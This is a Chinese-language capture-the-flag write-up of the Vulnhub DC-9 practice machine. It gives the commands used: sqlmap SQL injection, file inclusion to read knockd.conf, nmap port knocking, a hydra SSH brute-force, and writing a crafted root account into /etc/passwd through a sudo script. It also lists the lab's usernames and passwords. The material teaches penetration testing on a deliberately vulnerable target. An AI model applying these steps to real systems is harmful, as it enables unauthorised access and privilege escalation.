每周打靶 | Vulnhub-DC9靶机渗透实战

admin 2023年8月20日14:51:04评论45 views字数 2349阅读7分49秒阅读模式
1
免责声明
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,遵守国家相关法律法规,请勿用于违法用途如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
2
内容速览

0x00前言

这是网络安全自修室每周带星球小伙伴一起实战的第8台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知!

靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标!

攻击机:Kali Linux

靶机环境:192.168.241.142

所用工具:Nmap | Burpsuite | Sqlmap | Hydra | openssl

0x01 知识点

  • SQL注入
  • knockd服务 (限制ssh开启)
  • openssl生成加密账号

0x02 信息搜集

端口发现

只开放了80端口

每周打靶 | Vulnhub-DC9靶机渗透实战

每周打靶 | Vulnhub-DC9靶机渗透实战

对网页进行访问

每周打靶 | Vulnhub-DC9靶机渗透实战
登录页面,发现有两个地方可以操控,可能是sql注入,对http://192.168.241.142/manage.php操作,发现无果,接着尝试另一个search页面

http://192.168.241.142/manage.phphttp://192.168.241.142/search.php

输入1’ 报错,说明存在sql注入,但查看url,发现为post注入

综上信息搜集可以发现,该目标服务器为Linux, 仅开放80端口,中间件为Apache,考虑从SQL注入漏洞进行重点突破后台

0x03 获取权限

对result.php进行抓包,任意查询关键字,抓包保存

每周打靶 | Vulnhub-DC9靶机渗透实战
丢给sqlmap,直接开跑

python3 sqlmap.py -r search.txt --dbs --batch --level 5

每周打靶 | Vulnhub-DC9靶机渗透实战

发现员工表,进行跑字段和数据,获取admin的密码transorbital1
每周打靶 | Vulnhub-DC9靶机渗透实战
直接登录后台,发现报错文件不存在
每周打靶 | Vulnhub-DC9靶机渗透实战
考虑存在LFI漏洞
每周打靶 | Vulnhub-DC9靶机渗透实战
获取到用户列表保存为users.txt

rootsynclistgnatsBug-ReportingSystemsystemd-timesyncTimesystemd-networkNetworksystemd-resolvesystemd-coredumpCoremysqlmarymMoejuliedDooleyfredfFlintstonebarneyrRubbletomcCatjerrymMousewilmafFlintstonebettyrRubblechandlerbBingjoeytTribbianirachelgGreenrossgGellermonicagGellerphoebebBuffayscootsMcScootsjanitorTrumpjanitor2Morrison

但是,信息搜集未曾发现ssh服务端口打开,考虑可能是因为安装了端口敲门服务,端口敲门服务默认的配置文件路径为:/etc/knockd.conf

每周打靶 | Vulnhub-DC9靶机渗透实战

文件包含 读取下,发现需要连续扫描7469,8475,9842这三个端口,才能打开 尝试使用nmap 进行敲门服务

nmap 192.168.241.142 -p 7469nmap 192.168.241.142 -p 8475 nmap 192.168.241.142 -p 9842

所以扫描后发现ssh服务已开启

每周打靶 | Vulnhub-DC9靶机渗透实战

搜集之前注入时获取的密码作为字典

每周打靶 | Vulnhub-DC9靶机渗透实战
保存为passwords.txt

3kfs86sfd468sfdfsd24sfd87sfd1RocksOffTC&TheBoyzB8m#48sdPebblesBamBam01UrAG0D!Passw0rdyN72#dsdILoveRachel3248dsds7ssmellycatsYR3BVxxxw87IlovepeepeeHawaii-Five-0

使用hydra工具对ssh服务进行爆破

hydra -L username.txt -P passwd.txt ssh://192.168.88.13

每周打靶 | Vulnhub-DC9靶机渗透实战

登录janitor/Ilovepeepee账户,发现一个隐藏文件

ssh [email protected]

每周打靶 | Vulnhub-DC9靶机渗透实战

将隐藏文件的密码放入passwd中,再次解密发现一个新账号fredf/B4-Tru3-001

每周打靶 | Vulnhub-DC9靶机渗透实战

提权

查看fredf用户可以哪些具有root权限的命令

每周打靶 | Vulnhub-DC9靶机渗透实战
发现一个test.py的文件
每周打靶 | Vulnhub-DC9靶机渗透实战

py文件的含义为:读取参数1的内容,然后将参数1的内容写入到参数2的内容中。那我们可以构造一个root权限用户,将该用户信息写入文件内,将改文件作为参数1,/etc/passwd作为参数2,这样就创建了一个root权限用户,就能实现提权了

使用openssl创建一个加密本地用户admins,密码为123456

openssl passwd -1 -salt admins 123456

每周打靶 | Vulnhub-DC9靶机渗透实战

在/tmp下创建flag的文件,使用sudo用test文件运行这个文件

echo 'admins:admins$VQIAQbRBWh1F8Sv7e3vj91:0:0::/root:/bin/bash' >>/tmp/flag

切换到admin用户,获取flag

每周打靶 | Vulnhub-DC9靶机渗透实战

0x04 总结

  • 通过扫描发现只开启了web端口,并发现了注入漏洞
  • 从注入漏洞拿到了admin的账号密码,登录后台后发现LFI漏洞的,读取到Knock文件配置,发现开启ssh服务规律
  • 使用hydra爆破出ssh的三个账号,在其中一个账号中发现密码本,拓展爆破又拿到新账号密码fredf
  • 在fredf用户中发现具有suid权限的test.py脚本,可以将内容写入任意文件,构造具有root同等权限的用户admins的hash写入/etc/passwd文件中,获取到root权限

原文始发于微信公众号(网络安全自修室):每周打靶 | Vulnhub-DC9靶机渗透实战

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月20日14:51:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   每周打靶 | Vulnhub-DC9靶机渗透实战http://cn-sec.com/archives/1965266.html

发表评论

匿名网友 填写信息